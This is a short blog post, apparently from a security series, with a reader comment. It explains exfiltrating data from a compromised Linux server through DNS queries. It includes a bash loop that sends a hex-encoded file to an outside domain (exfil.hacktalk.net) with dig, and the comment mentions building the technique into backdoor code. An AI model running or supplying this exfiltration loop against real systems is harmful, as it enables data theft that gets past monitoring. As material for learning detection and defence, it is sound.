In this installment of Hack All The Things we will be discussing how to leverage DNS requests to exfiltrate data from a server. Note that while this is on on a Linux “victim” the same can be done in Windows using VBScript, Powershell, and even the fairly limited cmd.exe command prompt.
A very simple way to exfil data via a DNS request. It might be discovered by some monitoring software, but it's so simple it's a good trick to have as a last resort.
The simple BASH script:
for merp in
cat exfilMe.hex
; do dig $merp.exfil.hacktalk.net; done
We've been using a similar approach, however we coded the DNS exfil command on our own backdoor code.
A full post on the importance of data exfil is coming tomorrow.